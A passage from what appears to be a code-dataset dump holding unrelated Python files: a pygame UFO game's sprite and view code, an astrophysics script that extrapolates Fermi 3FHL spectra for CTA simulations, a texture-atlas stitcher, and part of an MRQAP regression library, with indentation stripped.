elif self.speed[1] < 0:
self.speed[1] += 1
def take_damage(self):
self.health -= random.randint(1, 3)
if self.health < 0:
self.health = 0
class UFOSprite(AFOSprite):
"""
Behaves like the base sprite and adds rotation.
"""
def __init__(self, image):
AFOSprite.__init__(self, image)
self.angle = 0
def update(self):
AFOSprite.update(self)
self.angle = (self.angle + 10) % 360
self.image = pygame.transform.rotate(self.original_image, self.angle)
self.rect = self.image.get_rect(center=self.rect.center)
class FighterJetSprite(pygame.sprite.Sprite):
def __init__(self, image, target):
pygame.sprite.Sprite.__init__(self)
self.name = 'Fighter Jet'
self.image = image
self.rect = image.get_rect()
self.target = target
self.reload_time = 0
self.movement = 0
self.fly_region = CANVAS_SIZE[1] / 1.5
self.movement_speed = random.randint(10.0, 30.0)
self.autopilot = True
self.exitpilot = False
self._firing = False
def _clamp(self):
if self.rect.left < 10:
self.rect.left = 10
if self.rect.top > CANVAS_SIZE[1] - 100:
self.rect.top = CANVAS_SIZE[1] - 100
if self.rect.right > CANVAS_SIZE[0] - 10:
self.rect.right = CANVAS_SIZE[0] - 10
if self.rect.top < self.fly_region:
self.rect.top = self.fly_region
def update(self):
if self.autopilot:
self.rect.top -= 4
if self.rect.bottom < CANVAS_SIZE[1] - 100:
self.autopilot = False
elif self.exitpilot:
if self.rect.top < CANVAS_SIZE[1]:
self.rect.left += 2
self.rect.top += 2
else:
# move inline with target and fire when ready and able.
diff = self.target.rect.left - self.rect.left
if abs(diff) > self.movement_speed:
self.rect.left += diff / self.movement_speed
if self.reload_time > 0:
self.reload_time -= 1
elif abs(diff) < 100:
print('Fire!')
self._firing = True
self.reload_time = 45
if random.randint(1, 100) < 5:
self.movement = -1
elif random.randint(1, 100) < 5:
self.movement = 1
elif random.randint(1, 100) < 5:
self.movement = 0
self.rect.top += self.movement * 4
self._clamp()
self.exitpilot = self.target.health == 0
@property
def is_firing(self):
if self._firing:
self._firing = False
return True
else:
return False
class MissileSprite(pygame.sprite.Sprite):
def __init__(self, image):
pygame.sprite.Sprite.__init__(self)
self.name = 'Missile'
self.image = image
self.rect = image.get_rect()
self.destroy = False
def update(self):
self.rect.top -= 10
if self.rect.bottom < 0:
self.destroy = True
class ExplosionSprite(pygame.sprite.Sprite):
small_size = (57, 57)
large_size = (89, 89)
small_rects = (
(1,185),(61,185),(121,185),(181,185),(241,185),
(1,245),(61,245),(121,245),(181,245),(241,245),
)
large_rects = (
(1,01),(93,01),(185,01),(277,01),(369,01),
(1,93),(93,93),(185,93),(277,93),(369,93),
)
def __init__(self, sprites, is_small=True):
pygame.sprite.Sprite.__init__(self)
self.sprites = sprites
self.animation_index = 0
self.destroy = False
self.image = None
self.is_small = is_small
self._set_sprite()
self.rect = self.image.get_rect()
def _set_sprite(self):
if self.is_small:
self.image = self.sprites.subsurface(self.small_rects[self.animation_index], self.small_size)
else:
self.image = self.sprites.subsurface(self.large_rects[self.animation_index], self.large_size)
def update(self):
self._set_sprite()
self.animation_index += 1
self.destroy = self.animation_index >= 10
class View(object):
def __init__(self, pixel_width, pixel_height, model):
# we may observe the model
self.model = model
# listen for model events
model.register_listener(self.model_event)
# calculate each block size, and set our viewport size.
self.screen_size = (pixel_width, pixel_height)
# init pygame
pygame.init()
pygame.display.set_caption('Conspiracy-101')
self.screen = pygame.display.set_mode(self.screen_size)
self.clock = pygame.time.Clock()
# draw game sprites to a surface of a fixed size
# which we can rescale when blitting to the screen
self.canvas = pygame.Surface(CANVAS_SIZE).convert()
self.canvas.set_colorkey(TRANSPARENT)
# calculate the scale size by the canvas/screen height ratio.
# since canvas is square the width+height always equal
# but we calculate anyway to be good citizens.
self.scale_ratio = self.screen_size[1] / float(CANVAS_SIZE[1])
print('scale ratio is %s' % (self.scale_ratio,))
self.scale_size = (
int(CANVAS_SIZE[0] * self.scale_ratio), self.screen_size[1])
self.scale_center = ((self.screen_size[0] - self.scale_size[0]) / 2,
(self.screen_size[1] - self.scale_size[1]) / 2)
print('scale center is %s' % (self.scale_center,))
# background image storage
self.background = self.canvas.copy()
self.load_background()
self.scrolling_background_yoffset = 0
# scenario description
self.brief_offset = 0
self.brief_sprite = None
self.results_sprite = None
self.tactical_info_sprite = None
# sprite sheets
self.parts_sprite_sheet = pygame.image.load(os.path.join('..', 'data', 'parts.png')).convert()
self.parts_sprite_sheet.set_colorkey(TRANSPARENT)
self.player_craft_sheet = pygame.image.load(os.path.join('..', 'data', 'ufo-sprites.png')).convert()
self.player_craft_sheet.set_colorkey(TRANSPARENT)
self.explosion_sprite_sheet = pygame.image.load(os.path.join('..', 'data', 'explosion3.png')).convert()
self.explosion_sprite_sheet.set_colorkey(TRANSPARENT)
# sprite storage
self.dragging_sprite = None
self.drag_offset = None
self.sprites = []
# font storage
self.font = pygame.font.Font(os.path.join('..', 'data', 'emulogic.ttf'), 12)
self.smallfont = pygame.font.Font(os.path.join('..', 'data', 'emulogic.ttf'), 10)
# confirm dialog
self.confirm_image = pygame.image.load(os.path.join('..', 'data', 'confirm-dialog.png')).convert()
self.confirm_action = None
# agent images
self.agent_image = pygame.image.load(os.path.join('..', 'data', 'agent.png')).convert()
# player objects
self.player_craft = None
# delay exit state
self.exit_counter = None
# music
pygame.mixer.music.load(os.path.join('..', 'data', 'kbmonkey-mission_control.xm'))
pygame.mixer.music.play(-1)
def load_background(self):
"""
Load a background depending on the game state.
"""
if self.model.state == STATE_MENU:
self.background = pygame.image.load(os.path.join('..', 'data', 'menu-screen.png')).convert()
if self.model.state == STATE_BUILD:
self.background = pygame.image.load(os.path.join('..', 'data', 'build-screen.png')).convert()
if self.model.state in (STATE_UFO, STATE_FLIGHT):
self.background = pygame.image.load(os.path.join('..', 'data', 'ufo-screen.png')).convert()
if self.model.state == STATE_RESULTS:
self.background = pygame.image.load(os.path.join('..', 'data', 'results-screen.png')).convert()
if self.model.state == STATE_END:
self.background = pygame.image.load(os.path.join('..', 'data', 'end-screen.png')).convert()
def load_build_sprites(self):
"""
Load sprites depending on the game state.
"""
self.sprites = []
parts = self.model.builder.get_level_parts()
print('level %s parts are %s' % (self.model.level, parts))
for part in parts:
rect = pygame.Rect(PARTS_RECT.get(part, None))
if rect:
image = self.parts_sprite_sheet.subsurface(rect)
rect.center = (random.randint(30, 570), random.randint(230, 370))
if self.model.builder.part_used(part):
rect.center = (random.randint(30, 570), random.randint(430, 570))
sprite = DraggableSprite(part, image, rect)
self.sprites.append(sprite)
else:
print('warning: part "%s" has no image rect definition' % (part,))
def load_player_craft_sprites(self):
self.sprites = []
# player craft
player = None
# start off at the bottom center of the screen
if self.model.state == STATE_UFO:
player = UFOSprite(self.player_craft_sheet.subsurface(UFO_RECT))
elif self.model.state == STATE_FLIGHT:
player = AFOSprite(self.player_craft_sheet.subsurface(LIGHTFIGHTER_RECT))
if player:
player.fly_region = CANVAS_SIZE[1] / 2
player.rect.center = (CANVAS_SIZE[0] / 2, CANVAS_SIZE[1])
self.sprites.append(player)
self.player_craft = player
def add_fighter_jet(self):
"""
Add a fighter jet to the play field.
"""
if self.player_craft:
jet = FighterJetSprite(
self.player_craft_sheet.subsurface(FIGHTER_RECT),
self.player_craft)
jet.rect.top = CANVAS_SIZE[1]
jet.rect.left = random.randint(100, 400)
self.sprites.append(jet)
def fire_jet_missile(self, jet):
"""
Fire a missile from a jet.
"""
missile = MissileSprite(
self.player_craft_sheet.subsurface(MISSILE_RECT))
missile.rect.center = jet.rect.center
missile.rect.left += (26 * random.randint(-1, 1))
self.sprites.append(missile)
def create_explosion(self, target, is_small=True):
"""
Creat an explosion near target (a sprite object).
"""
explosion = ExplosionSprite(self.explosion_sprite_sheet, is_small)
explosion.rect.center = target.rect.center
self.sprites.append(explosion)
def draw_hover_part_name(self):
"""
Return the part name under the cursor.
"""
if not self.confirm_action:
xy = self.translated_mousepos
for sprite in self.sprites:
if sprite.rect.collidepoint(xy):
part_name = self.font.render(
sprite.name, False, BLACK, TRANSPARENT)
part_name.set_colorkey(TRANSPARENT)
if part_name:
self.canvas.blit(part_name, (13, 370))
return
def draw_body_accuracy(self):
"""
Return the part name under the cursor.
"""
pass
#part_name = self.font.render(
#'accuracy: %s %%' % (self.model.builder.accuracy, ),
#False, BLACK, TRANSPARENT)
#part_name.set_colorkey(TRANSPARENT)
#if part_name:
#self.canvas.blit(part_name, (13, 420))
def blit(self):
"""
Draw the model state to our game canvas, and finally blit it
to the screen after we rescale it.
"""
garbage_sprites = []
self.canvas.blit(self.background, (0, 0))
if self.model.state != STATE_MENU and self.exit_counter > 0:
self.exit_counter -= 1
if self.model.state == STATE_BUILD:
# dragging a sprite
if self.dragging_sprite:
self.dragging_sprite.rect.center = (
self.translated_mousepos[0] - self.drag_offset[0],
self.translated_mousepos[1] - self.drag_offset[1],
)
# briefing words
if self.brief_sprite:
self.canvas.blit(self.brief_sprite.image,
(14, 22),
self.brief_sprite.rect.move(0, self.brief_offset))
# draw sprites
for sprite in self.sprites:
sprite.update()
self.canvas.blit(sprite.image, sprite.rect)
self.draw_hover_part_name()
self.draw_body_accuracy()
elif self.model.state in (STATE_UFO, STATE_FLIGHT):
bh = self.background.get_height()
self.scrolling_background_yoffset += 15
if self.scrolling_background_yoffset > bh:
self.scrolling_background_yoffset = 0
self.canvas.blit(self.background, (0, self.scrolling_background_yoffset))
self.canvas.blit(self.background, (0, self.scrolling_background_yoffset - bh))
# radar
self.draw_tactical_radar()
# health bar
self.draw_ufo_healthbar()
# help words
self.draw_ufo_help()
# exit
if self.exit_counter == 0:
self.model.mission_success = self.model.ufotactical.distance_from_goal < 10
self.model.set_state(STATE_RESULTS)
# draw sprites
for sprite in self.sprites:
sprite.update()
self.canvas.blit(sprite.image, sprite.rect)
if isinstance(sprite, FighterJetSprite):
if sprite.is_firing:
self.fire_jet_missile(sprite)
elif isinstance(sprite, MissileSprite):
if self.player_craft.health > 0:
if self.player_craft.rect.colliderect(sprite.rect):
# TODO hit sound and explosion
garbage_sprites.append(sprite)
self.player_craft.take_damage()
if self.player_craft.health > 0:
self.create_explosion(sprite, is_small=True)
else:
self.create_explosion(sprite, is_small=False)
elif isinstance(sprite, AFOSprite):
if self.player_craft.health == 0 and not self.exit_counter:
self.exit_counter = 100
garbage_sprites.append(sprite)
elif isinstance(sprite, ExplosionSprite):
if sprite.destroy:
garbage_sprites.append(sprite)
elif self.model.state == STATE_RESULTS:
# report!
if self.results_sprite:
self.canvas.blit(self.results_sprite, (111, 100))
if self.model.state != STATE_MENU:
# garbage
for g in garbage_sprites:
if g in self.sprites:
self.sprites.remove(g)
# confirm
if self.confirm_action:
csize = self.canvas.get_size()
size = pygame.Rect((0, 0), self.confirm_image.get_size())
size.center = (csize[0] / 2, csize[1] / 2)
self.canvas.blit(self.confirm_image, size)
# rescale
if self.scale_ratio > 1.0:
self.screen.blit(
pygame.transform.scale(self.canvas, self.scale_size),
self.scale_center)
else:
self.screen.blit(self.canvas, (0, 0))
# flip and tick
pygame.display.flip()
self.clock.tick(FRAMERATE)
def draw_tactical_radar(self):
# base image
self.canvas.blit(
self.player_craft_sheet.subsurface(RADAR_RECT),
(10, 10))
# enemy fighters
incoming_jets = self.model.ufotactical.jet_distances
for enemy in incoming_jets:
# draw a dot for it's distance.
epos = (
50,
45 + ((enemy / 500.0) * 40)
)
self.canvas.blit(
self.player_craft_sheet.subsurface(RADAR_HOSTILE_RECT),
epos)
# dot for goal distance
epos = (
50,
50 - ((self.model.ufotactical.distance_from_goal / 2000.0) * 40)
)
self.canvas.blit(
self.player_craft_sheet.subsurface(RADAR_GOAL_RECT),
epos)
# green zone
if self.model.ufotactical.distance_from_goal == 0:
self.canvas.blit(self.player_craft_sheet.subsurface(GREEN_ZONE_RECT), (10, 120))
def draw_ufo_help(self):
if self.model.state in (STATE_UFO, STATE_FLIGHT):
# for the first few ticks
if self.model.ufotactical.clock < 250: #250
# show some helpful words of wisdom
if self.tactical_info_sprite:
self.canvas.blit(self.tactical_info_sprite, (220, 40))
# draw the agent picture
self.canvas.blit(self.agent_image, (10, 10))
def draw_ufo_healthbar(self):
hp = self.player_craft.health * 8 + 1
fullrect = pygame.Rect(10, 100, 80, 10)
rect = pygame.Rect(10, 100, hp, 10)
pygame.draw.rect(self.canvas, RED, fullrect, 0)
pygame.draw.rect(self.canvas, GREEN, rect, 0)
pygame.draw.rect(self.canvas, BLACK, fullrect, 2)
def print_wrapped_text(self, sentence, maxlength, font, color):
"""
Creates an image with the given words wrapped.
"""
lines = []
paragraphs = sentence.split('\n')
for p in paragraphs:
lines.extend(textwrap.wrap(p, maxlength))
lines.append(' ')
surfii = []
max_width = 0
total_height = 0
for line in lines:
surfii.append(font.render(line, False, color, TRANSPARENT))
print_size = surfii[-1].get_size()
if print_size[0] > max_width:
max_width = print_size[0]
total_height += print_size[1]
combined = pygame.Surface((max_width, total_height))
combined.fill(TRANSPARENT)
print_position = 0
for print_surface in surfii:
combined.blit(print_surface, (0, print_position))
print_position += print_surface.get_height()
combined.set_colorkey(TRANSPARENT)
return combined
def draw_briefing_words(self):
"""
Redraw the briefing wording.
"""
if self.model.state == STATE_BUILD:
BRIEF_TEXT_HEIGHT = 150
brief_text = LEVEL_SCENARIOS[self.model.level]
if self.model.level > 1:
if self.model.mission_success:
brief_text = 'My commendations on your last ' \
'mission, what a success!\n' + brief_text
else:
brief_text = 'Failure like your last mission will ' \
'not be tolerated. Let us hope your next ' \
'mission goes better...\n' + brief_text
sprite = pygame.sprite.Sprite()
image = self.print_wrapped_text(
brief_text,
30,
self.font,
TEXT
)
sprite.image = image
sprite.rect = pygame.Rect((0, 0), (image.get_width(), BRIEF_TEXT_HEIGHT))
self.brief_sprite = sprite
elif self.model.state in (STATE_UFO, STATE_FLIGHT):
if self.model.level == 1:
words = 'Avoid gunfire until you reach the target zone. ' \
'Once in the zone force the craft down by engaging ' \
'enemy fire. Use the arrows or wsad keys. Good luck Agent!'
elif self.model.level == 2:
words = 'Again, only get shot down when inside the ' \
'Green Zone. Use the arrows or wsad keys. Good luck Agent!'
elif self.model.level == 3:
words = 'You know the drill by now, Agent. ' \
'Keep it tidy and see you at debriefing! '
elif self.model.level == 5:
words = 'Look sharp, Agent. Reports indicate more ' \
'resistance, incoming!'
elif self.model.level == 6:
words = 'Something has come up, I am going in hiding ' \
'and so should you! Finish the mission and disappear!'
else:
self.tactical_info_sprite = None
return
if words:
helpful_words = self.print_wrapped_text(
words, 30, self.font, TEXT )
self.tactical_info_sprite = helpful_words.copy()
self.tactical_info_sprite.fill(BORDER)
self.tactical_info_sprite.blit(helpful_words, (0,0))
elif self.model.state == STATE_RESULTS:
self.results_sprite = self.print_wrapped_text(
self.model.results, 35, self.smallfont, BLACK)
def scroll_brief(self, offset):
if self.model.state == STATE_BUILD:
self.brief_offset += offset
max_size = self.brief_sprite.rect.height * 6
if self.brief_offset > max_size:
self.brief_offset = max_size
if self.brief_offset < 0:
self.brief_offset = 0
def model_event(self, event_name, data):
print('view event "%s" => %s' % (event_name, data))
if event_name == 'levelup':
self.player_craft = None
elif event_name == 'state':
self.load_background()
if self.model.is_new_level:
self.brief_offset = 0
self.draw_briefing_words()
self.exit_counter = None
self.load_build_sprites()
if self.model.state in (STATE_UFO, STATE_FLIGHT) and not self.player_craft:
self.draw_briefing_words()
self.load_player_craft_sprites()
if self.model.state == STATE_RESULTS:
self.draw_briefing_words()
elif event_name == 'deploy fighter jet':
self.add_fighter_jet()
@property
def translated_mousepos(self):
"""
Get the mouse position as translated to to screen size ratio.
"""
xy = pygame.mouse.get_pos()
scaled_xoffset = (self.scale_center[0] / self.scale_ratio)
scaled_yoffset = (self.scale_center[1] / self.scale_ratio)
xy = (
xy[0] / self.scale_ratio - scaled_xoffset,
xy[1] / self.scale_ratio - scaled_yoffset)
return xy
def mouseDown(self):
if self.model.state == STATE_MENU:
return
self.dragging_sprite = None
xy = self.translated_mousepos
# affirmative and negatory buttons
if self.confirm_action:
affirm = pygame.Rect(204, 287, 191, 25)
if affirm.collidepoint(xy):
if self.confirm_action == 'plant':
if self.model.level == len(TACTICAL_TYPE):
print('Warning: There are no tactical missions for level %s' % self.model.level)
else:
self.model.set_state(TACTICAL_TYPE[self.model.level])
self.confirm_action = None
negate = pygame.Rect(204, 337, 191, 25)
if negate.collidepoint(xy):
self.confirm_action = None
return
if self.model.state == STATE_BUILD:
# sprite click
for sprite in self.sprites:
if sprite.rect.collidepoint(xy):
self.dragging_sprite = sprite
# place dragging sprite on top
self.sprites.remove(self.dragging_sprite)
self.sprites.append(self.dragging_sprite)
self.drag_offset = (
xy[0] - sprite.rect.center[0],
xy[1] - sprite.rect.center[1],
)
return
# plant button click
button = pygame.Rect(390, 165, 198, 29)
if button.collidepoint(xy):
self.confirm_action = 'plant'
def mouseUp(self):
if self.dragging_sprite:
part = self.dragging_sprite.name
x,y = self.dragging_sprite.rect.center
self.dragging_sprite = None
if y < 400:
self.model.builder.remove_part(part)
else:
self.model.builder.add_part(part)
def mouseWheelUp(self):
self.scroll_brief(-16)
def mouseWheelDown(self):
self.scroll_brief(16)
def keyDown(self, key):
if key == K_DOWN:
self.scroll_brief(16)
if key == K_UP:
self.scroll_brief(-16)
| gpl-3.0 | -8,907,586,306,427,302,000 | 33.199783 | 111 | 0.518509 | false | 3.798143 | false | false | false |
davidsanchez/CTAtools | Script/SimulSelectedFrom3FHL.py | 1 | 5367 | #Created to read salvatore table, read 3FHL data and etrapolated (Using Biteau prescription) and simulate with CTOOLS
# Made for Rio 2017.
# author David Sanchez [email protected]
# Gate Florian
# Piel Quentin
# ------ Imports --------------- #
import numpy,math,pyfits,os,sys
from Plot.PlotLibrary import *
from Catalog.ReadFermiCatalog import *
from environ import FERMI_CATALOG_DIR,INST_DIR
from Plot.PlotLibrary import *
from ebltable.tau_from_model import OptDepth as OD
from os.path import join
import Script.Common_Functions as CF
import ctoolsAnalysis.xml_generator as xml
from ctoolsAnalysis.config import get_config,get_default_config
from ctoolsAnalysis.SimulateSource import CTA_ctools_sim
from submit import call
# ------------------------------ #
def GetInfoFromTable(fitstable,indice):
'''read salvatore table and return info corresponding to the source at the place indice
Parameters
---------
fitstable : pyfits object : table to be browsed
indice : place of the source in the table
'''
data = fitstable[1].data[indice]
sourcename = data[0]
ra = data[1]
dec = data[2]
z = data[4]
if math.isnan(z):
z=0
hemisphere = data[6]
observation_type = data[8]
if hemisphere =='S':
hemisphere ='South'
if hemisphere =='N':
hemisphere ='North'
return sourcename,ra,dec,z,hemisphere,observation_type
def cutoff(energy,z):
'''correct with JB cut off prescription
Parameters
---------
energy : in TeV.
'''
return numpy.exp(-energy/(3./(1+z)))
def ComputeExtrapolateSpectrum(sourcename,z,eblmodel = "dominguez",alpha = -1,out="."):
try :
Cat = FermiCatalogReader.fromName(sourcename,FK5,FERMI_CATALOG_DIR,"dnde","MeV") #read 3FHL
except :
print 'cannot read 3FHL for some reason, returning'
return
emin = 5e4 #Mev
emax = 100e6
params = Cat.ReadPL("3FHL")
print params
spec = Spectrum(params,Model="PowerLaw",Emin=emin,
Emax=emax,Representation="dnde",escale="MeV",
Npt=1000)
energy,phi = spec.GetModel()
# Cat.MakeSpectrum("3FHL",emin,emax)
# _,_,energy,phi = Cat.Plot("3FHL")
SpectreWithCutoff = cutoff(energy/1e6,z)
#Correct for EBL using Dominguez model
tau = OD.readmodel(model = eblmodel)
TauEBL = tau.opt_depth(z,energy/1e6)
Etau2 = numpy.interp([2.],TauEBL,energy/1e6)*1e6 # Input in TeV -> Get MeV at the end
EBL_corrected_phi = phi*numpy.exp(alpha * TauEBL)
phi_extrapolated = EBL_corrected_phi*SpectreWithCutoff
# phi_extrapolated = EBL_corrected_phi
outfile = out+"/"+sourcename.replace(" ","")+"_File.txt"
CF.MakeFileFunction(energy,phi_extrapolated+1e-300,outfile)
return outfile, Etau2
if __name__=="__main__":
TableInfo = pyfits.open(INST_DIR+'/data/table_20161213.fits')
outfolder = join(os.getcwd(), "out/Dominguez3TeVCutOff")
# outfolder = join(os.getcwd(), "out/DominguezNoCutOff")
#default work and out path.
work = join(os.getcwd(), "work")
os.system("mkdir -p "+outfolder)
i = int(sys.argv[1])
sourcename,ra,dec,z,hemisphere,_ = GetInfoFromTable(TableInfo,i)
print 'work on source ',sourcename,' at a redsift of z=',z
Filefunction, Etau2 = ComputeExtrapolateSpectrum(sourcename,z,eblmodel = "dominguez",alpha = -1,out=outfolder)
########### Create XML
lib,doc = xml.CreateLib()
spec = xml.addFileFunction(lib, sourcename, type = "PointSource",filefun=Filefunction,flux_free=1, flux_value=1., flux_scale=1.,flux_max=100000000.0, flux_min=0.0)
spatial = xml.AddPointLike(doc,ra,dec)
spec.appendChild(spatial)
lib.appendChild(spec)
bkg = xml.addCTAIrfBackground(lib)
lib.appendChild(bkg)
open(Filefunction.replace("_File.txt",'.xml'), 'w').write(doc.toprettyxml(' '))
#######################
simutime = 100 #Hours
irfTime = CF.IrfChoice(simutime)
# setup : Time, Energy and IRFS.
tmin = 0
tmax = int(simutime*3600)
emin_table =[0.05,Etau2*1e-6] #TeV
emax = 100 #TeV
irf = "South_z20_"+str(irfTime.replace(".0",""))+"h"
caldb = "prod3b"
config = CF.MakeconfigFromDefault(outfolder,work,sourcename,ra,dec)
# config.write(open("simu_"+sourcename.replace(" ","")+"_"+str(simutime)+"h"+".conf", 'w'))
for emin in emin_table:
print 'simu'
#creation of the simulation object
# simu = CTA_ctools_sim.fromConfig(config)
# simu.SetTimeRange(tmin,tmax)
# simu.SetIRFs(caldb,irf)
# simu.SetEnergyRange(float(emin),emax)
config["file"]["inmodel"] = Filefunction.replace("_File.txt",'.xml')
config["time"]["tmin"] = tmin
config["time"]["tmax"] = tmax
config["irfs"]["irf"] = irf
config["irfs"]["caldb"] = caldb
config["energy"]["emin"] = float(emin)
config["energy"]["emax"] = emax
config_file = Filefunction.replace("_File.txt","_"+str(int(emin*100.)/100.)+"TeV"+".conf")
config.write(open(config_file, 'w'))
print "save configuration file ",config_file
# run the simulation
cmd = "python "+join(os.getcwd(), "Simulate_Ctools.py")+" "+config_file
call(cmd,config_file.replace(".conf",".sh"),config_file.replace(".conf",".log"))
# os.system(cmd)
| gpl-3.0 | 5,488,889,861,555,646,000 | 32.335404 | 167 | 0.6376 | false | 3.072124 | true | false | false |
nagakawa/x801 | tools/autostitch.py | 1 | 2633 | # Texture Stitcher for x801
# Usage: python3 tools/autostitch.py assets/textures/terrain/blocks asset-src/textures/terrain/gimpfiles/blocknames.tti assets/textures/terrain/blocks.tti asset-temp/textures/terrain/gimpfiles
import argparse
import fparser
import pathlib
import re
import readtable
from PIL import Image
parser = argparse.ArgumentParser(description='Stitch textures for Experiment801.')
parser.add_argument('destinationImage', metavar='di', type=str, nargs=1,
help='the destination path for the image')
parser.add_argument('sourceTable', metavar='sd', type=str, nargs=1,
help='the source path for the table')
parser.add_argument('destinationTable', metavar='dd', type=str, nargs=1,
help='the destination path for the table')
parser.add_argument('images', metavar='images', type=str, nargs=1,
help='the path with the appropriate images')
args = parser.parse_args()
tsize = 32
# Reasonable requirement for max texture size
# according to http://feedback.wildfiregames.com/report/opengl/feature/GL_MAX_TEXTURE_SIZE
asize = 4096
tdim = asize // tsize
cumul = 0
pageno = 0
capat = tdim * tdim
image = Image.new(
"RGBA",
(asize, asize),
(0, 0, 0, 0)
)
st = args.sourceTable[0]
# name -> id
nametrans = lambda x: x
if st != "*":
nametable = readtable.read(st)
nametrans = lambda x: nametable.get(x, None)
table = {}
def save():
image.save(args.destinationImage[0] + "." + str(pageno) + ".png")
for fn in pathlib.Path(args.images[0]).glob("*.png"):
# Add file entry
shortname = fn.name
shortname = shortname[0:shortname.rfind('.')]
myid = nametrans(shortname)
if myid is None:
fparser.error("Name not found: " + shortname)
table[myid] = cumul + capat * pageno
# Try to open image
newImage = Image.open(str(fn))
if newImage.height > tsize:
fparser.error("Image is too tall: %d > %d", newImage.height, tsize)
# Write image
nSlots = (newImage.height + tsize - 1) // tsize;
progress = 0
while progress < nSlots:
if cumul >= capat:
# No more room.
# Save the current image and start a new page
save()
image = Image.new(
"RGBA",
(asize, asize),
(0, 0, 0, 0)
)
pageno += 1
cumul -= capat
x = cumul % tdim
y = cumul // tdim
pasteAmt = min(nSlots, tdim - x)
region = newImage.crop(
(x * tsize, 0, (x + pasteAmt) * tsize, tsize)
)
image.paste(newImage, (x * tsize, y * tsize))
cumul += pasteAmt
progress += pasteAmt
save()
fh = open(args.destinationTable[0], "w")
for (name, index) in table.items():
fh.write(str(name) + " " + str(index) + "\n")
fh.close() | agpl-3.0 | 3,161,928,597,332,988,400 | 27.945055 | 193 | 0.664261 | false | 3.058072 | false | false | false |
lisette-espin/mrqap | libs/mrqap.py | 1 | 11208 | __author__ = 'espin'
#######################################################################
# Dependencies
#######################################################################
import sys
import collections
import numpy as np
import pandas
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from statsmodels.formula.api import ols
from libs import utils
from libs.profiling import Profiling
import time
import gc
from scipy import stats
from scipy.stats.mstats import zscore
#######################################################################
# MRQAP
#######################################################################
INTERCEPT = 'Intercept'
class MRQAP():
#####################################################################################
# Constructor and Init
#####################################################################################
def __init__(self, Y=None, X=None, npermutations=-1, diagonal=False, directed=False, logfile=None, memory=None, standarized=False):
'''
Initialization of variables
:param Y: numpy array depended variable
:param X: dictionary of numpy array independed variables
:param npermutations: int number of permutations
:param diagonal: boolean, False to delete diagonal from the OLS model
:return:
'''
self.X = X # independent variables: dictionary of numpy.array
self.Y = Y # dependent variable: dictionary numpy.array
self.n = Y.values()[0].shape[0] # number of nodes
self.npermutations = npermutations # number of permutations
self.diagonal = diagonal # False then diagonal is removed
self.directed = directed # directed True, undirected False
self.data = None # Pandas DataFrame
self.model = None # OLS Model y ~ x1 + x2 + x3 (original)
self.v = collections.OrderedDict() # vectorized matrices, flatten variables with no diagonal
self.betas = collections.OrderedDict() # betas distribution
self.tvalues = collections.OrderedDict() # t-test values
self.logfile = logfile # logfile path name
self.standarized = standarized
self.memory = memory if memory is not None else Profiling() # to track memory usage
def init(self):
'''
Generating the original OLS model. Y and Xs are flattened.
Also, the betas and tvalues dictionaries are initialized (key:independent variables, value:[])
:return:
'''
self.v[self.Y.keys()[0]] = self._getFlatten(self.Y.values()[0])
self._initCoefficients(INTERCEPT)
for k,x in self.X.items():
if k == self.Y.keys()[0]:
utils.printf('ERROR: Idependent variable cannot be named \'[}\''.format(self.Y.keys()[0]), self.logfile)
sys.exit(0)
self.v[k] = self._getFlatten(x)
self._initCoefficients(k)
self.data = pandas.DataFrame(self.v)
self.model = self._fit(self.v.keys(), self.data)
del(self.X)
def profiling(self, key):
self.memory.check_memory(key)
#####################################################################################
# Core QAP methods
#####################################################################################
def mrqap(self):
'''
MultipleRegression Quadratic Assignment Procedure
:return:
'''
directed = 'd' if self.directed else 'i'
key = self.npermutations if self.memory.perm else self.n
self.profiling('init-{}-{}'.format(directed, key))
self.init()
self.profiling('shuffle-{}-{}'.format(directed, key))
self._shuffle()
self.profiling('end-{}-{}'.format(directed, key))
def _shuffle(self):
'''
Shuffling rows and columns npermutations times.
beta coefficients and tvalues are stored.
:return:
'''
for p in range(self.npermutations):
self.Ymod = self.Y.values()[0].copy()
self._rmperm()
model = self._newfit()
self._update_betas(model._results.params)
self._update_tvalues(model.tvalues)
self.Ymod = None
gc.collect()
def _newfit(self):
'''
Generates a new OLS fit model
:return:
'''
newv = collections.OrderedDict()
newv[self.Y.keys()[0]] = self._getFlatten(self.Ymod)
for k,x in self.v.items():
if k != self.Y.keys()[0]:
newv[k] = x
newdata = pandas.DataFrame(newv)
newfit = self._fit(newv.keys(), newdata)
del(newdata)
del(newv)
return newfit
#####################################################################################
# Handlers
#####################################################################################
def _fit(self, keys, data):
'''
Fitting OLS model
v a dictionary with all variables.
:return:
'''
if self.standarized:
data = data.apply(lambda x: (x - np.mean(x)) / (np.std(x)), axis=0) #axis: 0 to each column, 1 to each row
formula = '{} ~ {}'.format(self.Y.keys()[0], ' + '.join([k for k in keys if k != self.Y.keys()[0]]))
return ols(formula, data).fit()
def _initCoefficients(self, key):
self.betas[key] = []
self.tvalues[key] = []
def _rmperm(self, duplicates=True):
shuffle = np.random.permutation(self.Ymod.shape[0])
np.take(self.Ymod,shuffle,axis=0,out=self.Ymod)
np.take(self.Ymod,shuffle,axis=1,out=self.Ymod)
del(shuffle)
def _update_betas(self, betas):
for idx,k in enumerate(self.betas.keys()):
self.betas[k].append(round(betas[idx],6))
def _update_tvalues(self, tvalues):
for k in self.tvalues.keys():
self.tvalues[k].append(round(tvalues[k],6))
def _getFlatten(self, original):
return self._deleteDiagonalFlatten(original)
def _deleteDiagonalFlatten(self, original):
tmp = original.flatten()
if not self.diagonal:
tmp = np.delete(tmp, [i*(original.shape[0]+1)for i in range(original.shape[0])])
return tmp
def _zeroDiagonalFlatten(self, original):
tmp = original.copy()
if not self.diagonal:
np.fill_diagonal(tmp,0)
f = tmp.flatten()
del(tmp)
return f
#####################################################################################
# Prints
#####################################################################################
def summary(self):
'''
Prints the OLS original summary and beta and tvalue summary.
:return:
'''
self._summary_ols()
self._summary_betas()
self._summary_tvalues()
self._ttest()
def _summary_ols(self):
'''
Print the OLS summary
:return:
'''
utils.printf('', self.logfile)
utils.printf('=== Summary OLS (original) ===\n{}'.format(self.model.summary()), self.logfile)
utils.printf('', self.logfile)
utils.printf('# of Permutations: {}'.format(self.npermutations), self.logfile)
def _summary_betas(self):
'''
Summary of beta coefficients
:return:
'''
utils.printf('', self.logfile)
utils.printf('=== Summary beta coefficients ===', self.logfile)
